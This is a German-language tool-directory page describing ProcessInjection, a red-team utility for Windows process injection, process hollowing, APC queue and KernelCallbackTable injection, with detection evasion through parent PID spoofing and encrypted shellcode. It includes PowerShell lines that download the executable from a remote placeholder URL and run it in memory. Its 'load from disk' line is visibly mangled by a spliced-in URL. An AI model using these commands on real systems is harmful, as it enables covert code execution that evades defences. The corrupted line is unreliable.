Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ProcessInjection — Dieses Programm wurde entwickelt, um verschiedene Prozessinjektionstechniken zu demonstrieren. | Kitploit
Tools/GitHubGitHub/3xpl01tc0d3r/processinjection
Privilege EscalationVerschlüsselungs-/EntschlüsselungstoolsExploitationIDS/IPS-UmgehungPost-ExploitationLernen & BildungRed TeamingBinary-Exploitation
GitHub3xpl01tc0d3r/processinjection

ProcessInjection

Dieses Programm wurde entwickelt, um verschiedene Prozessinjektionstechniken zu demonstrieren.

Repository anzeigen
1.3k191vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ProcessInjection


Das Programm ist dafür ausgelegt, Prozessinjektion durchzuführen. Derzeit unterstützt das Tool 5 Prozessinjektionstechniken.

root@kitploit:~
1) Vanilla Process Injection
2) DLL Injection
3) Process Hollowing
4) APC Queue
5) KernelCallbackTable Injection

Das Tool akzeptiert Shellcode in 4 Formaten.

root@kitploit:~
1) base64
2) hex
3) c
4) raw

Das Tool unterstützt 4 Methoden zur Durchführung von Prozessinjektion.

root@kitploit:~
1) P/Invoke
2) D/Invoke
3) Direct Syscalls
4) Indirect Syscalls

Unterstützt 3 Techniken zur Umgehung von Erkennung.

root@kitploit:~
1) Parent PID Spoofing

Verschlüsselung
2) XOR-Verschlüsselung (Kann auch mit der Parent-PID-Spoofing-Technik verwendet werden, kann aber nicht mit der DLL-Injection-Technik verwendet werden)
3) AES-Verschlüsselung (Kann auch mit der Parent-PID-Spoofing-Technik verwendet werden, kann aber nicht mit der DLL-Injection-Technik verwendet werden)

Kann per Reflection geladen werden.

root@kitploit:~
# Load from the disk
[System.Reflection.Assembly]:https://raw.githubusercontent.com/3xpl01tc0d3r/processinjection/HEAD/:Load(%5BSystem.IO.File%5D::ReadAllBytes(%22ProcessInjection.exe%22))

# Load from a remote server
[System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData("http://<URL>/ProcessInjection.exe"))

# Perform process injection
[ProcessInjection.ProcessInjection]::Main(@("/t:1", "/f:base64", "/pid:<ProcessId>", "/sc:<ShellCode>"))

Befehlszeilenverwendung

root@kitploit:~
Verwendung      Beschreibung
-----           -----------
/t              Geben Sie die ID der Prozessinjektionstechnik an.
                1 = Vanilla Process Injection
                2 = DLL Injection
                3 = Process Hollowing
                4 = APC Queue Injection
				5 = KernelCallbackTable Injection
/m              Geben Sie die zu verwendende Methode an.
                p = P/Invoke (Standard)
                d = D/Invoke
		ds = Direct Syscalls
		ids = Indirect Syscalls
/f              Geben Sie das Format des Shellcodes an.
                base64
                hex
                c
                raw
/pid            Geben Sie die Prozess-ID an.
/parentproc     Geben Sie den Namen des übergeordneten Prozesses an.
/path           Geben Sie den Pfad der Datei an, die den Shellcode enthält.
/ppath          Geben Sie den Pfad der ausführbaren Datei an, die gestartet wird (erforderlich bei Verwendung des /parentproc-Arguments).
/url            Geben Sie die URL an, auf der der Shellcode gehostet wird.
/enc            Geben Sie den Verschlüsselungstyp (aes oder xor) an, mit dem der Shellcode verschlüsselt ist.
/key            Geben Sie den Schlüssel an, der zum Entschlüsseln des Shellcodes verwendet wird.
/sc             Geben Sie den Shellcode direkt im base64- oder Hex-Format an. Hinweis: Um großen Shellcode zu übergeben, nutzen Sie bitte Reflection, um das Programm auszuführen.  
/help           Hilfe anzeigen

Blogbeitrag

https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html

https://3xpl01tc0d3r.blogspot.com/2019/09/process-injection-part-ii.html

https://3xpl01tc0d3r.blogspot.com/2019/10/process-injection-part-iii.html

https://medium.com/@r3n_hat/parent-pid-spoofing-b0b17317168e

https://3xpl01tc0d3r.blogspot.com/2019/12/process-injection-part-v.html

https://3xpl01tc0d3r.blogspot.com/2020/08/process-injection-tool-updates.html

Danksagung

Renos

Danksagungen gehen auch an:

Aaron Bray & Rasta Mouse für den Process-Hollowing-Code

The Wover & b33f für Dynamic Invoke - (https://thewover.github.io/Dynamic-Invoke/)

Tool herunterladen